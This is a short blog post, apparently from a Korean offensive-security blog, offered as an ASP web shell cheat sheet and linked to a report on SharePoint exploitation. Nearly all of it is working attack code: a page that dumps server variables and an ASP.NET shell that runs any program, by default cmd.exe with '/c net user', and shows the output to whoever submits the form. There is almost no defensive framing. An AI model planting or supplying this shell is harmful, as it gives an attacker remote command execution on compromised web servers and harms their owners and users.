Everything is hacked.

There is no 100 % security.

Attack Code/WEB

WebShell - Cheetsheat (asp)

Kai_HT 2025. 1. 23. 14:02

https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/

asp

<!DOCTYPE html>
<html>
<body>
<%response.write("RedSec Kai_HT")%>
</body>
</html>
<%response.write("RedSec Kai_HT")%>
<html>
<body>
<table>
<% for each key in Request.ServerVariables %>
<tr>
<td><%=key %></td>
<td>
<%
  if Request.ServerVariables(key) = "" Then
    Response.Write " "
  else
    Response.Write Request.ServerVariables(key)
  end if
%>
</td></tr>
<% Next %>
</table>
</body>
</html>
<% for each key in Request.ServerVariables %> <% Next %>
<%=key %> <% if Request.ServerVariables(key) = "" Then Response.Write " " else Response.Write Request.ServerVariables(key) end if %> 
  <%@ Page Language="VB" Debug="true" %>
  <%@ import Namespace="system.IO" %>
  <%@ import Namespace="System.Diagnostics" %>
	<script runat="server">
	Sub RunCmd(Src As Object, E As EventArgs)
	Dim myProcess As New Process()
	Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
	myProcessStartInfo.UseShellExecute = false
	myProcessStartInfo.RedirectStandardOutput = true
	myProcess.StartInfo = myProcessStartInfo
	myProcessStartInfo.Arguments=xcmd.text
	myProcess.Start()
	Dim myStreamReader As StreamReader = myProcess.StandardOutput
	Dim myString As String = myStreamReader.Readtoend()
	myProcess.Close()
	
	mystring=replace(mystring,"<","&lt;")
	mystring=replace(mystring,">" ,"&gt;")
	result.text=vbcrlf &"<pre>" & mystring &"</pre>"
	End Sub
	</script>
	
	<html>
		<body>
			<form runat="server">
			<p>
			<asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
			<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
			</p>
			<asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
			<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>           <p>
			<asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"/>           <p>
			<asp:Label id="result" runat="server"/>
			</form>
		</body
	</html>
 <%@ Page Language="VB" Debug="true" %> <%@ import Namespace="system.IO" %> <%@ import Namespace="System.Diagnostics" %>

Programc:\windows\system32\cmd.exe

Arguments /c net user           

           

 

저작자표시 비영리

'Attack Code > WEB' 카테고리의 다른 글

XML/JSON Request Of CSRF  (1) 2025.01.23
XXE Code in XLSX  (0) 2025.01.17
Web Editor Default Page Location  (0) 2023.08.24
Webshell - Cheetsheat (jsp/jspx)  (0) 2023.08.22
XSS Pattern  (0) 2023.08.22

'Attack Code/WEB'의 다른글

  • 현재글WebShell - Cheetsheat (asp)

관련글

댓글

티스토리툴바